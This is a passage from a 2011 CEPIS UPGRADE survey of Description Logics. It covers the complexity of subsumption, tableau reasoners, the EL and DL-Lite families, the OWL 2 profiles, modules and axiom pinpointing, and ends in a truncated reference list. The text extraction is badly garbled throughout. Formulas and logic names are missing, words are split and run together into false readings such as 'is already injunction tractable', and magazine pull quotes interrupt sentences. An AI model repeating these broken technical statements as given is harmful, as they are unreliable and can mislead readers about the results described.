systems, like KANDOR [Pate84], K-REP [MaDW91],
and BACK [Pelt91], indeed employed polynomial-time
subsumption algorithms. Later on, however, it turned out
that subsumption in rather inexpressive DLs may be intractable [LeBr87], that subsumption in KL-ONE is even
undecidable [Schm89], and that even for systems like
KANDOR and BACK, for which the expressiveness of
the underlying DL had been carefully restricted with the
goal of retaining tractability, the subsumption problem
is in fact intractable [Nebe88]. The reason for the discrepancy between the complexity of the subsumption algorithms employed in the above mention early DL systems and the worst-case complexity of the subsumption
problems these algorithms were supposed to solve was
due to the fact that these systems employed sound, but
incomplete subsumption algorithms, i.e., algorithms
whose positive answers to subsumption queries are correct, but whose negative answers may be incorrect. The
use of incomplete algorithms has since then largely been
abandoned in the DL community, mainly because of the
problem that the behavior of the systems is no longer
determined by the semantics of the description language:
an incomplete algorithm may claim that a subsumption
relationship does not hold, although it should hold according to the semantics. All the intractability results
mentioned above already hold for subsumption between
concept descriptions without a TBox. An even worse blow
to the quest for a practically useful DL with a sound,
complete, and polynomial-time subsumption algorithm
was Nebel’s result [Nebe90] that subsumption w.r.t. an
acyclic TBox (i.e., an unambiguous set of concept definitions without cyclic dependencies) in a DL with conand value restriction
is already injunction
tractable. 2
At about the time when these (negative) complexity
results were obtained, a new approach for solving inference problems in DLs, such as the subsumption and the
instance problem, was introduced. This so-called tableau2
All the systems mentioned above supported these two concept
constructors, which were at that time viewed as being indispensable for a DL. The DL with exactly these two concept constructors is
called
[Baad90c]
3
<http://www.w3.org/TR/2009/REC-owl2-overview-20091027/>.
© CEPIS
Farewell Edition
based approach was first introduced in the context of
DLs by Schmidt-Schau [Schm89] and Smolka [ScSm91],
though it had already been used for modal logics long
before that [Fitt72]. It has turned out that this approach
can be used to handle a great variety of different DLs
(see [BaSa01] for an overview and, e.g., [HoSa05,
HoKS06, LuMi07] for more recent results), and it yields
sound and complete inference algorithms also for very
expressive DLs. Although the worst-case complexity of
these algorithms is quite high, the tableau-based approach
nevertheless often yields practical procedures: optimized
implementations of such procedures have turned out to
behave quite well in applications [BFHN*94, Horr03,
HaMo08], even for expressive DLs with a high worstcase complexity (ExpTime and beyond). The advent of
tableau-based algorithms was the main reason why the
DL community basically abandoned the search for DLs
with tractable inference problems, and concentrated on
the design of practical tableau-based algorithms for expressive DLs. The most prominent modern DL systems,
FaCT++ [TSHo06], Racer [HaMo01b], and Pellet
[SiPa04] support very expressive DLs and employ highlyoptimized tableau-based algorithms. In addition to the
fact that DLs are equipped with a well-defined formal
semantics, the availability of mature systems that support sound and complete reasoning in very expressive
description formalisms was an important argument in
favor of using DLs as the foundation of OWL, the standard ontology language for the Semantic Web. In fact,
OWL DL is based on the expressive DL
,
for which reasoning is in the worst-case NExpTime-complete [HoPa04].
The research on how to extend the expressive power
DLs has actually not stopped with the adoption of
as the DL underlying OWL. In fact, the
new version of the OWL standard, OWL 2,3 is based on
the even more expressive DL
, which is
2NExpTime-complete [Kaza08]. The main new features
of
are the use of qualified number restric-
tions
rather than simple number restrictions
,
and the availability of (a restricted form of) role inclu. For example, with a simple number resion axioms
striction we can describe the concept of a man that has
three children
but we cannot specify properties of these children, as
in the qualified number restriction
2 More recent developments: Light-weight DLs
and the need for novel inference tools
In this section, we first discuss the
and the DL-
CEPIS UPGRADE Vol. XII, No. 5, December 2011 113
UPENET
“
Description Logics are a well-investigated family
of logic-based knowledge representation formalisms
”
Litee families of light-weight DLs, and then consider inference problems different from the subsumption and the
instance problem.
Light-weight DLs: the
family
The ever increasing expressive power and worst-case
complexity of expressive DLs, combined with the increased use of DL-based ontology languages in practical
applications due to the OWL standard, has also resulted
in an increasing number of ontologies that cannot be handled by tableau-based reasoning systems without manual
tuning by the system developers, despite highly optimized
implementations. Perhaps the most prominent example
is the well-known medical ontology SNOMED CT 4 ,
which comprises 380,000 concepts and is used as a standardized health care terminology in a variety of countries
such as the US, Canada, and Australia. In tests performed
in 2005 with FaCT++ and Racer, neither of the two systems could classify SNOMED CT [BaLS05]5, and Pellet
still could not classify SNOMED CT in tests performed
in 2008 [Meng09].
From the DL point of view, SNOMED CT is an acyclic TBox that contains only the concept constructors con, existential restriction
, and the top
junction
concept ( ┬ ). The DL with exactly these three concept
constructors is called
[BaKM99]. In contrast to its
counterpart with value restrictions,
, the light-weight
has much better algorithmic properties. Whereas
DL
subsumption without a TBox is polynomial in both
[BaKM99] and
[LeBr87], subsumption in
4
<http://www.ihtsdo.org/snomed-ct/>.
Note, however, that more recent versions of FaCT++ and Racer
perform quite well on SNOMED CT [Meng09], due to optimizations
specifically tailored towards the classification of SNOMED CT.
5
Figure 1: The completion rules for subsumption in
w.r.t. an acyclic TBox is coNP-complete [Nebe90] and
w.r.t. GCIs it is even ExpTime-complete [BaBL05]. In
contrast, subsumption in
stays tractable even w.r.t.
GCIs [Bran04], and this result is stable under the addition of several interesting means of expressivity [BaBL05,
BaBL08].
The polynomial-time subsumption algorithm for
[Bran04, BaBL05] actually classifies the given TBox
, i.e., it simultaneously computes all subsumption relationships between the concept names occurring in .
This algorithm proceeds in four steps:
1. Normalize the TBox.
2. Translate the normalized TBox into a graph.
3. Complete the graph using completion rules.
4. Read off the subsumption relationships from the
normalized graph.
-TBox is normalized if it only contains GCIs
An
of the following form:
,
where
are concept names or the top-
┬
concept . Any
-TBox can be transformed in polynomial time into a normalized one by applying equivalence-preserving normalization rules [Bran04]. In the
next step, a classification graph
is built, where
┬
„ V is the set of concept names (including
) occurring in the normalized TBox ;
„ S labels nodes with sets of concept names (again
including ┬ );
„ R labels edges with sets of role names.
The label sets are supposed to satisfy the following
invariants:
„ S(A) contains only subsumers of A w.r.t.
.
w.r.t. general TBoxes.
“
Description Logics differ from their predecessors
in that they are equipped with a formal, logic-based semantics
114
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
”
© CEPIS
UPENET
„
R(A,B) contains only roles r such that
sumes A w.r.t.
sub-
.
Initially, we set
for all nodes
,
and
for all edges
. Obviously, the above invariants are satisfied by these initial
label sets.
The labels of nodes and edges are then extended by
applying the rules of Figure 1. Note that a rule is only
applied if it really extends a label set. It is easy to see
that these rules preserve the above invariants. The fact
w.r.t. TBoxes can be decided in
that subsumption in
polynomial time is an immediate consequence of the facts
that (i) rule application terminates after a polynomial
number of steps, and (ii) if no more rules are applicable
then S(A) contains exactly those concept names B occurring in that are subsumers of A w.r.t. (see [Bran04,
BaBL05] for more details and full proofs).
Light-weight DLs: the DL-Lite family
Another problematic issue with expressive DLs is that
query answering in such DLs does not scale too well to
knowledge bases with a very large ABox. In this context, queries are conjunctions of assertions that may also
contain variables, of which some can be existentially
quantified. For example, the query
asks for all men that have a child that is a woman 6 ,
but in general the use of variables allows the formulation of more complex queries than simple instance queries. In the database world, these kinds of queries are
called conjunctive queries [AbHV95]; the difference to
the pure database case is that, in addition to the instance
data, we also have a TBox. As an example, consider the
ABox assertions stating facts about John and Mackenzie
from the previous section. Without any additional information about the meaning of the predicates Man, child,
and Woman, the individual JOHN is not an answer to the
above query. However, if we take the concept definitions
6
This simple query could also be expressed as an instance query
using the
-concept description
, but in
general the use of variables allows the formulation of more complex queries than simple instance queries.
“
DLs is used as
the foundation of OWL,
the standard ontology
language for
the Semantic Web
”
© CEPIS
Farewell Edition
“
Knowledge representation
systems based on DLs provide
their users with various inference
services that allow them to
deduce implicit knowledge
”
and GCIs introduced in the previous section into account,
then JOHN turns out to be an answer to this query.
Query answering in expressive DLs such as the al(i.e.,
without conready mentioned
crete domains) is 2ExpTime-complete regarding combined complexity [Lutz08], i.e., the complexity w.r.t. the
size of the TBox and the ABox. Thus, query answering
in this logic is even harder than subsumption while at the
same time being much more time critical. Moreover,
is coNP-complete [OrCE08]
query answering in
regarding data complexity (i.e., in the size of the ABox),
which is viewed as "unfeasible" in the database community. These complexity hardness results for answering
conjunctive queries in expressive DLs are dramatic since
many DL applications, such as those that use ABoxes as
web repositories, involve ABoxes with hundreds of thousands of individuals. It is a commonly held opinion that,
in order to achieve truly scalable query answering in the
short term, it is essential to make use of conventional
relational database systems for query answering in DLs.
Given this proviso, the question is what expressivity can
a DL offer such that queries can be answered using relational database technology while at the same time meaningful concepts can be specified in the TBox. As an answer to this, the DL-Lite family has been introduced in
[CGL+05, CDL+-KR06, CGL+07], designed to allow the
implementation of conjunctive query answering "on top
of" a relational database system.
DL-Litecore is the basic member of the DL-Lite family
[CGL+07]. Concept descriptions of this DL are of the
where A is a concept name, r
form
is a role name, and r denotes the inverse of the role
name r. A DL-Lite core knowledge base (KB) consists of a
TBox and an ABox. The TBox formalism allows for GCIs
and disjointness axioms between DL-Litecore concept descriptions C;D:
where disj(C,D) states that C,D must always be interpreted as disjoint sets. A DL-Litecore-ABox is a finite
set of concept and role assertions: A(a) and r(a; b), where
A is a concept name, r is a role name, and a; b are individual names.
, DL-Lite cannot express qualified
In contrast to
existential restrictions such as
in the
TBox. Conversely,
does not have inverse roles, which
CEPIS UPGRADE Vol. XII, No. 5, December 2011 115
UPENET
“
The medical ontology
SNOMED CT comprises
380,000 concepts and
is used as a standardized
health care terminology
in the US, Canada,
and Australia
”
are available (albeit in a limited way) in \dllite.
In principle, query answering in DL-Lite can be realized as follows:
1. use the TBox to reformulate the given conjuncand then distive queries q into an first-order query
card the TBox;
;
2. view the ABox as a relational database
in the database
using a relational
3. evaluate
query engine.
In practice, more work needs to be done to turn this
into a scalable approach for query answering. For examgenerated by the reformulation step
ple, the queries
are very different from the SQL queries usually formulated by humans, and thus relational database engines
are not optimized for such queries.
it is possible to implement
Interestingly, also in
query answering using a relational database system
[LuToWo-IJCAI-09]. In contrast to the approach for DLLite, the TBox is incorporated into the ABox and not into
the query. In addition, some limited query reformulation
(independent of both the TBox and the ABox) is also required.
The relevance of the light-weight DLs discussed
above is underlined by the fact that both of them are captured in the official W3C profiles7 document for OWL
2. Each of the OWL 2 profiles are designed for specific
application requirements. For applications that rely on
reasoning services for ontologies with a large number of
concepts, the profile OWL 2 EL has been introduced,
, a tractable extension of
.
which is based on
For applications that deal with large sets of data and that
mainly use the reasoning service of query answering, the
profile OWL 2 QL has been defined. The DL underlying
this profile is a member of the DL-Lite.
Novel inference problems
The developers of the early DL systems concentrated
7
on the subsumption and the instance problem, and the
same was true until recently for the developers of highly
optimized systems for expressive DLs. The development,
maintenance, and usage of large ontologies can, however, also be profit from the use of other inference procedures. Certain non-standard inference problems, like
unification [BaNa00, BaMo09], matching [BKBM99,
BaKu00], and the problem of computing least common
subsumers [BaKu98, BaKM99, BaST07, DCNS09] have
been investigated for quite a while [BaKu06]. Unification and matching can, for example, help the ontology
engineer to find redundancies in large ontologies, and
least common subsumers and most specific concepts can
be used to generate concepts from examples.
Others non-standard inference problems have, however, come into the focus of mainstream DL research only
recently. One example is conjunctive query answering,
which is not only investigated for light-weight DLs (see
above), but also for expressive DLs [GHLS07, Lutz08].
Another is identification and extraction of modules
and
inside an ontology. Intuitively, given an ontology
a signature (i.e., a subset of the concept and role names
occurring in ), a module
is a subset of such that
the following holds for all concept descriptions C,D that
can be built from symbols in
is subsumed by D w.r.t.
if C is subsumed by D w.r.t. . Consequently, if one
is only interested in subsumption between concepts built
from symbols in , it is sufficient to use is instead of
the (possibly much larger) whole ontology . Similarly,
one can also introduce the notion of a module for other
inference problems (such as query answering). An overview over different approaches for defining modules and
a guideline for when to use which notion of a module
can be found in [SaSZ09]. Module identification and extraction is computationally costly for expressive DLs, and
even undecidable for very expressive ones such as OWL
DL [LuWW07]. Both for the
family [LuWo07,
Sunt08] and the DL-Lite family [KWZ-KR-08], the reasoning problems that are relevant in this area are
decidable and usually of much lower complexity than for
expressive DLs.
For a developer or user of a DL-based ontology, it is
often quite hard to understand why a certain consequence
computed by the reasoner actually follows from the
knowledge base. For example, in the DL version of the
medical ontology SNOMED CT, the concept Amputationof-Finger is classified as a subconcept of Amputationof-Arm. Finding the six axioms that are responsible for
this error [BaSu08] among the more than 350,000 con-
“
DL-Litecore is the basic
member of the
DL-Lite family
<http://www.w3.org/TR/owl2-profiles/>.
116
CEPIS UPGRADE Vol. XII, No. 5, December 2011
Farewell Edition
”
© CEPIS
UPENET
“
The DL research of the last 30 years has lead
to highly expressive ontology languages
”
cept definitions of SNOMED CT without support by an
automated reasoning tool is not easy. Axiom pinpointing
[ScCo03] has been introduced to help developers or users of DL-based ontologies understand the reasons why
a certain consequence holds by computing minimal subsets of the knowledge base that have the consequence in
question (called MinAs or Explanations). There are two
general approaches for computing MinAs: the black-box
approach and the glass-box approach. The most naïve
variant of the black-box approach considers all subsets
of the ontology, and computes for each of them whether
it still has the consequence or not. More sophisticated
versions [KPHS07] use a variant of Reiter’s [Reit87] hitting set tree algorithm to compute all MinAs. Instead of
applying such a black-box approach to a large ontology,
one can also first try to find a small and easy to compute
subset of the ontology that contains all MinAs, and then
apply the black-box approach to this subset [BaSu08].
The main advantage of the black-box approach is that it
can use existing highly-optimized DL reasoners unchanged. However, it may be necessary to call the
reasoner an exponential number of times. In contrast, the
glass-box approach tries to find all MinAs by a single
run of a modified reasoner.
Most of the glass-box pinpointing algorithms described in the DL literature (e.g., [ScCo03, PaSK05,
LeMP06]) are obtained as extensions of tableau-based
reasoning algorithms [BaSa01] for computing consequences from DL knowledge bases. To overcome the
problem of having to design a new pinpointing extension for every tableau-based algorithm, the papers
[BaPe07, BaPe09] introduce a general approach for extending tableau-based algorithms to pinpointing algorithms. This approach is based on a general notion of
"tableau algorithm," which captures many of the known
tableau-based algorithms for DLs and Modal Logics, but
also other kinds of decision procedures, like the polynomial-time subsumption algorithm for the DL
sketched above. Any such tableau algorithm can be extended to a pinpointing algorithm, which is correct in
the sense that a terminating run of the algorithm computes all MinAs. Unfortunately, however, termination
need not transfer from a given tableau to its pinpointing
extension, and the approach only applies to tableau-based
algorithms that terminate without requiring any cyclechecking mechanism (usually called "blocking" in the
DL community). Though these problems can, in principle, be solved by restricting the general framework to
so-called forest tableaux [BaPe09], this solution makes
the definitions and proofs more complicated and less intuitive.
© CEPIS
Farewell Edition
In [BaPe08], a different general approach for obtaining glass-box pinpointing algorithms, which also applies
to DLs for which the termination of tableau-based algorithms requires the use of blocking. It is well-known that
automata working on infinite trees can often be used to
construct worst-case optimal decision procedures for such
DLs [BaTo01, CaGL02]. In this automata-based approach, the input inference problem à is translated into a
, which is then tested for emptiness.
tree automaton
Basically, pinpointing is then realized by transforming
into a weighted tree automaton
the tree automaton
working on infinite trees, and computing the so-called
behavior of this weighted automaton.
3 Conclusion
The DL research of the last 30 years has lead, on the
one hand, to highly expressive ontology languages, which
can nevertheless be supported by practical reasoning
tools. On the other hand, the recent development of lightweight DLs and specialized reasoning tools for them ensures that DL reasoning scales to large ontologies with
hundreds of thousands of terminological axioms (like
SNOMED CT) and, by using database technology, to
much larger sets of instance data. In addition, novel inference methods such as modularization and pinpointing
support building and maintaining high-quality ontologies.
CEPIS UPGRADE Vol. XII, No. 5, December 2011 117
UPENET
References
[AbHV95] Serge Abiteboul, Richard Hull, and
Victor Vianu. Foundations of
Databases. Addison Wesley Publ.
Co., Reading, Massachussetts,
1995.
[Baad90c] Franz Baader. Terminological cycles in KL-ONE-based knowledge
representation languages. In Proc.
of the 8th Nat. Conf. on Artificial
Intelligence (AAAI’90), pages
621-626, Boston (Ma, USA), 1990.
[BaBL05] Franz Baader, Sebastian Brandt,
and Carsten Lutz. Pushing the EL
envelope. In Leslie Pack Kaelbling
and Alessandro Saffiotti, editors,
Proc. of the 19th Int. Joint Conf.
on Artificial Intelligence (IJCAI
2005), pages 364-369, Edinburgh
(UK), 2005. Morgan Kaufmann,
Los Altos.
[BaBL08] Franz Baader, Sebastian Brandt,
and Carsten Lutz. Pushing the EL
envelope further. In Kendall Clark
and Peter F. Patel-Schneider, editors, In Proceedings of the Fifth International Workshop on OWL:
Experiences and Directions
(OWLED’08), Karlsruhe, Germany, 2008.
[BCNMP03] Franz Baader, Diego Calvanese,
Deborah McGuinness, Daniele
Nardi, and Peter F. Patel-Schneider, editors. The Description Logic
Handbook: Theory, Implementation, and Applications. Cambridge
University Press, 2003.
[BFHN*94]
Franz Baader, Enrico
Franconi, Bernhard Hollunder,
Bernhard Nebel, and Hans-Jürgen
Protlich. An empirical analysis of
optimization techniques for terminological representation systems
or: Making KRIS get a move on.
Applied Artificial Intelligence.
Special Issue on Knowledge Based
Management, 4:109-132, 1994.
[BaKu98] Franz Baader and Ralf Küsters.
Computing the least common
subsumer and the most specific
concept in the presence of cyclic
ALN-concept descriptions. In
Proc. of the 22nd German Annual
Conf. on Articial Intelligence
(KI’98), volume 1504 of Lecture
Notes in Computer Science, pages
129-140. Springer-Verlag, 1998.
[BaKu00] Franz Baader and Ralf Küsters.
Matching in description logics with
existential restrictions. In Proc. of
the 7th Int. Conf. on Principles of
Knowledge Representation and
Reasoning (KR 2000), pages 261272, 2000.
118
[BaKu06] Franz Baader and Ralf Küsters.
Nonstandard inferences in description logics: The story so far. In
D.M. Gabbay, S.S. Goncharov, and
M. Zakharyaschev, editors, Mathematical Problems from Applied
Logic I, volume 4 of International
Mathematical Series, pages 1-75.
Springer-Verlag, 2006.
[BKBM99]
Franz Baader, Ralf Küsters,
Alex Borgida, and Deborah L.
McGuinness. Matching in description logics. J. of Logic and Computation, 9(3):411-447, 1999.
[BaKM99]Franz Baader, Ralf Küsters, and
Ralf Molitor. Computing least
common subsumers in description
logics with existential restrictions.
In Proc. of the 16th Int. Joint Conf.
on Artifucial Intelligence
(IJCAI’99), pages 96-101, 1999.
[BaLS05] Franz Baader, Carsten Lutz, and
Boontawee Suntisrivaraporn. Is
tractable reasoning in extensions of
the description logic EL useful in
practice? In Proceedings of the
2005 International Workshop on
Methods for Modalities (M4M05), 2005.
[BaMo09] Franz Baader and Barbara
Morawska. Unification in the description logic EL. In Ralf Treinen,
editor, Proc. of the 20th Int. Conf.
on Rewriting Techniques and Applications (RTA 2009), volume
5595 of Lecture Notes in Computer Science, pages 350-364.
Springer-Verlag, 2009.
[BaNa00] Franz Baader and Paliath
Narendran. Unification of concepts
terms in description logics. J. of
Symbolic
Computation,
31(3):277-305, 2001.
[BaPe07] Franz Baader and Rafael Peñaloza.
Axiom pinpointing in general tableaux. In Proc. of the Int. Conf. on
Analytic Tableaux and Related
Methods (TABLEAUX 2007),
volume 4548 of Lecture Notes in
Artificial Intelligence, pages 11-27.
Springer-Verlag, 2007.
[BaPe08] Franz Baader and Rafael Peñaloza.
Automata-based axiom pinpointing. In Alessandro Armando, Peter
Baumgartner, and Gilles Dowek,
editors, Proc. of the Int. Joint Conf.
on Automated Reasoning (IJCAR
2008), volume 5195 of Lecture
Notes in Artificial Intelligence,
pages 226-241. Springer-Verlag,
2008.
[BaPe09] Franz Baader and Rafael Peñaloza.
Axiom pinpointing in general tableaux. Journal of Logic and Com-
CEPIS UPGRADE Vol. XII, No. 5, December 2011
putation, 2009. To appear.
[BaSa01] Franz Baader and Ulrike Sattler. An
overview of tableau algorithms for
description logics. Studia Logica,
69:5-40, 2001.
[BaST07] Franz Baader, Baris Sertkaya, and
Anni-Yasmin Turhan. Computing
the least common subsumer w.r.t.
a background terminology. J. of
Applied Logic, 5(3):392-420,
2007.
[BaSu08] Franz Baader and Boontawee
Suntisrivaraporn. Debugging
SNOMED CT using axiom pinpointing in the description logic
EL+. In Proceedings of the International Conference on Representing and Sharing Knowledge Using
SNOMED (KR-MED’08), Phoenix, Arizona, 2008.
[BaTo01] Franz Baader and Stephan Tobies.
The inverse method implements
the automata approach for modal
satisfiability. In Proc. of the Int.
Joint Conf. on Automated Reasoning (IJCAR 2001), volume 2083 of
Lecture Notes in Artificial Intelligence, pages 92-106. SpringerVerlag, 2001.
[BrLe85] Ronald J. Brachman and Hector J.
Levesque, editors. Readings in
Knowledge Representation.
Morgan Kaufmann, Los Altos,
1985.
[BrSc85] Ronald J. Brachman and James G.
Schmolze. An overview of the KLONE knowledge representation
system. Cognitive Science,
9(2):171-216, 1985.
[Bran04] Sebastian Brandt. Polynomial time
reasoning in a description logic
with existential restrictions, GCI
axioms, and what else? In Ramon
López de Mántaras and Lorenza
Saitta, editors, Proc. of the 16th
Eur. Conf. on Artificial Intelligence
(ECAI 2004), pages 298-302,
2004.
[CGL+05] Diego Calvanese, Giuseppe De
Giacomo, Domenico Lembo,
Maurizio Lenzerini, and Riccardo
Rosati. DL-Lite: Tractable description logics for ontologies. In
Manuela M. Veloso and Subbarao
Kambhampati, editors, Proc. of the
20th Nat. Conf. on Artificial Intelligence (AAAI 2005), pages 602607. AAAI Press/The MIT Press,
2005.
[CDL+-KR06] Diego Calvanese, Giuseppe de
Giacomo, Domenico Lembo,
Maurizio Lenzerini, and Riccardo
Rosati. Data complexity of query
answering in description logics. In
Farewell Edition
© CEPIS
UPENET
Patrick Doherty, John Mylopoulos,
and Christopher A. Welty, editors,
Proc. of the 10th Int. Conf. on Principles of Knowledge Representation and Reasoning (KR 2006),
pages 260-270. AAAI Press/The
MIT Press, 2006.
[CGL+07] Diego Calvanese, Giuseppe De
Giacomo, Domenico Lembo,
Maurizio Lenzerini, and Riccardo
Rosati. Tractable reasoning and efficient query answering in description logics: The DL-Lite family. J.
of Automated Reasoning,
39(3):385-429, 2007.
[CaGL02] Diego Calvanese, Giuseppe
DeGiacomo, and Maurizio
Lenzerini. 2ATAs make DLs easy.
In Proc. of the 2002 Description
Logic Workshop (DL 2002), pages
107-118. CEUR Electronic Workshop Proceedings, http://ceurws.org/Vol-53/, 2002.
[DCNS09] Francesco M. Donini, Simona
Colucci, Tommaso Di Noia, and
Eugenio Di Sciascio. A tableauxbased method for computing least
common subsumers for expressive
description logics. In Craig
Boutilier, editor, Proc. of the 21st
Int. Joint Conf. on Artificial Intelligence (IJCAI 2009), pages 739745, 2009.
[Fitt72] Melvin Fitting. Tableau methods of
proof for modal logics. Notre
Dame J. of Formal Logic,
13(2):237-247, 1972.
[GHLS07] Birte Glimm, Ian Horrocks,
Carsten Lutz, and Ulrike Sattler.
Conjunctive query answering for
the description logic SHIQ. In
Manuela M. Veloso, editor, Proc.
Of the 20th Int. Joint Conf. on Artificial Intelligence (IJCAI 2007),
pages 399-404, Hyderabad, India,
2007.
[HaMo01b]
Volker Haarslev and Ralf
Möller. RACER system description. In Proc. of the Int. Joint Conf.
on Automated Reasoning (IJCAR
2001), volume 2083 of Lecture
Notes in Artificial Intelligence,
pages 701-706. Springer-Verlag,
2001.
[HaMo08] Volker Haarslev and Ralf Möller.
On the scalability of description
logic instance retrieval. J. of Automated Reasoning, 41(2):99-142,
2008.
[Haye79] Patrick J. Hayes. The logic of
frames. In D.Metzing, editor,
Frame Conceptions and Text Understanding, pages 46-61. Walter
de Gruyter and Co., 1979. Repub-
© CEPIS
lished in [BrLe85].
[Horr03] Ian Horrocks. Implementation and
optimization techniques. In
[BCNMP03], pages 306-346.
2003.
[HoKS06] Ian Horrocks, Oliver Kutz, and
Ulrike Sattler. The even more irresistible SROIQ. In Patrick Doherty,
John Mylopoulos, and Christopher
A. Welty, editors, Proc. of the 10th
Int. Conf. on Principles of Knowledge Representation and Reasoning (KR 2006), pages 57-67, Lake
District, UK, 2006. AAAI Press/
The MIT Press.
[HoPa04] Ian Horrocks and Peter F. PatelSchneider. Reducing OWL entailment to description logic
satisfiability. J. Web Sem.,
1(4):345-357, 2004.
[HoPH03] Ian Horrocks, Peter F. Patel-Schneider, and Frank van Harmelen.
From SHIQ and RDF to OWL: The
making of a web ontology language. Journal of Web Semantics,
1(1):7-26, 2003.
[HoSa05] Ian Horrocks and Ulrike Sattler. A
tableaux decision procedure for
SHOIQ. In Proc. of the 19th Int.
Joint Conf. on Artificial Intelligence (IJCAI 2005), Edinburgh
(UK), 2005. Morgan Kaufmann,
Los Altos.
[KPHS07] Aditya Kalyanpur, Bijan Parsia,
Matthew Horridge, and Evren
Sirin. Finding all justifications of
OWL DL entailments. In Proceedings of the 6th International Semantic Web Conference and 2nd
Asian Semantic Web Conference,
ISWC 2007 + ASWC 2007, volume 4825 of Lecture Notes in
Computer Science, pages 267-280,
Busan, Korea, 2007. SpringerVerlag.
[Kaza08] Yevgeny Kazakov. RIQ and
SROIQ are harder than SHOIQ. In
Gerhard Brewka and Jérôme Lang,
editors, Proc. of the 11th Int. Conf.
on Principles of Knowledge Representation and Reasoning (KR
2008), pages 274-284. AAAI
Press, 2008.
[KWZ-KR-08] Roman Kontchakov, Frank
Wolter,
and
Michael
Zakharyaschev. Can you tell the
difference between DL-Lite
ontologies? In Gerhard Brewka
and Jérôme Lang, editors, Proc. of
the 11th Int. Conf. on Principles of
Knowledge Representation and
Reasoning (KR 2008), pages 285295. Morgan Kaufmann, Los Altos, 2008.
Farewell Edition
[LeMP06] Kevin Lee, Thomas Meyer, and
Jeff Z. Pan. Computing maximally
satisfiable terminologies for the description logic ALC with GCIs. In
Proc. of the 2006 Description
Logic Workshop (DL 2006), volume 189 of CEUR Electronic
Workshop Proceedings, 2006.
[LeBr87] Hector J. Levesque and Ron J.
Brachman. Expressiveness and
tractability in knowledge representation and reasoning. Computational Intelligence, 3:78-93, 1987.
[Lutz08] Carsten Lutz. The complexity of
conjunctive query answering in expressive description logics. In
Alessandro Armando, Peter
Baumgartner, and Gilles Dowek,
editors, Proc. of the Int. Joint Conf.
on Automated Reasoning (IJCAR
2008), Lecture Notes in Artificial
Intelligence, pages 179-193.
Springer-Verlag, 2008.
[LuMi07] Carsten Lutz and Maja Milicic. A
tableau algorithm for description
logics with concrete domains and
general tboxes. J. of Automated
Reasoning, 38(1-3):227-259,
2007.
[LuToWo-IJCAI-09] Carsten Lutz, David
Toman, and Frank Wolter. Conjunctive query answering in the description logic EL using a relational
database system. In Proceedings of
the 21st International Joint Conference on Artificial Intelligence
IJCAI09. AAAI Press, 2009. To
appear.
[LuWW07]
Carsten Lutz, Dirk Walther,
and Frank Wolter. Conservative extensions in expressive description
logics. In Manuela M. Veloso, editor, Proc. of the 20th Int. Joint Conf.
on Artificial Intelligence (IJCAI
2007), pages 453-458, Hyderabad,
India, 2007.
[LuWo07] Carsten Lutz and Frank Wolter.
Conservative extensions in the
lightweight description logic EL. In
Frank Pfenning, editor, Proc. of the
21st Int. Conf. on Automated Deduction (CADE 2007), volume
4603 of Lecture Notes in Computer Science, pages 84-99, Bremen,
Germany, 2007. Springer-Verlag.
[MaDW91]
E. Mays, R. Dionne, and R.
Weida. K-REP system overview.
SIGART Bull., 2(3), 1991.
[Mins81] Marvin Minsky. A framework for
representing knowledge. In John
Haugeland, editor, Mind Design.
The MIT Press, 1981. A longer version appeared in The Psychology
of Computer Vision (1975). Re-
CEPIS UPGRADE Vol. XII, No. 5, December 2011 119
UPENET
published in [BrLe85].
[Nebe88] Bernhard Nebel. Computational
complexity of terminological reasoning in BACK. Artificial Intelligence, 34(3):371-383, 1988.
[Nebe90] Bernhard Nebel. Terminological
reasoning is inherently intractable.
Artificial Intelligence, 43:235-249,
1990.
[OrCE08] Magdalena
Ortiz,
Diego
Calvanese, and Thomas Eiter. Data
complexity of query answering in
expressive description logics via
tableaux. J. of Automated Reasoning, 41(1):61-98, 2008.
[PaSK05] Bijan Parsia, Evren Sirin, and
Aditya Kalyanpur. Debugging
OWL ontologies. In Allan Ellis and
Tatsuya Hagino, editors, Proc. of
the 14th International Conference
on World Wide Web (WWW’05),
pages 633-640. ACM, 2005.
[Pate84] Peter F. Patel-Schneider. Small can
be beautiful in knowledge representation. In Proc. of the IEEE
Workshop on Knowledge-Based
Systems, 1984. An extended version appeared as Fairchild Tech.
Rep. 660 and FLAIR Tech. Rep.
37, October 1984.
[Pelt91] Christof Peltason. The BACK system: an overview. SIGART Bull.,
2(3):114-119, 1991.
[Quil67] M. Ross Quillian. Word concepts:
A theory and simulation of some
basic capabilities. Behavioral Science, 12:410-430, 1967. Republished in [BrLe85].
[Reit87] R. Reiter. A theory of diagnosis
from first principles. Artificial Intelligence, 32(1):57-95, 1987.
[SaSZ09] Ulrike Sattler, Thomas Schneider,
and Michael Zakharyaschev.
Which kind of module should I extract? In Proc. of the 2008 Description Logic Workshop (DL 2009),
volume 477 of CEUR Workshop
Proceedings, 2009.
[ScCo03] Stefan Schlobach and Ronald Cornet. Non-standard reasoning services for the debugging of description logic terminologies. In Georg
Gottlob and Toby Walsh, editors,
Proc. of the 18th Int. Joint Conf.
on Artificial Intelligence (IJCAI
2003), pages 355-362, Acapulco,
Mexico, 2003. Morgan Kaufmann,
Los Altos.
[Schm89] Manfred
Schmidt-Schauß.
Subsumption in KL-ONE is undecidable. In Ron J. Brachman, Hector J. Levesque, and Ray Reiter,
editors, Proc. of the 1st Int. Conf.
on the Principles of Knowledge
120
[ScSm91]
[ScGC79]
[SiPa04]
[Sunt08]
[Meng09]
[TSHo06]
Representation and Reasoning
(KR’89), pages 421-431. Morgan
Kaufmann, Los Altos, 1989.
Manfred Schmidt-Schauß and Gert
Smolka. Attributive concept descriptions with complements. Artificial Intelligence, 48(1):1-26,
1991.
Len K. Schubert, Randy G. Goebel,
and Nicola J. Cercone. The structure and organization of a semantic net for comprehension and inference. In N. V. Findler, editor, Associative Networks: Representation and Use of Knowledge by
Computers, pages 121-175. Academic Press, 1979.
Evren Sirin and Bijan Parsia. Pellet: An OWL DL reasoner. In Proc.
of the 2004 Description Logic
Workshop (DL 2004), pages 212213, 2004.
Boontawee Suntisrivaraporn.
Module extraction and incremental classification: A pragmatic approach for EL+ ontologies. In Sean
Bechhofer, Manfred Hauswirth,
Joerg Ho mann, and Manolis
Koubarakis, editors, Proceedings
of the 5th European Semantic Web
Conference (ESWC’08), volume
5021 of Lecture Notes in Computer Science, pages 230-244.
Springer-Verlag, 2008.
Boontawee Suntisrivaraporn. Polynomial-Time Reasoning Support
for Design and Maintenance of
Large-Scale
Biomedical
Ontologies. PhD thesis, Fakultät
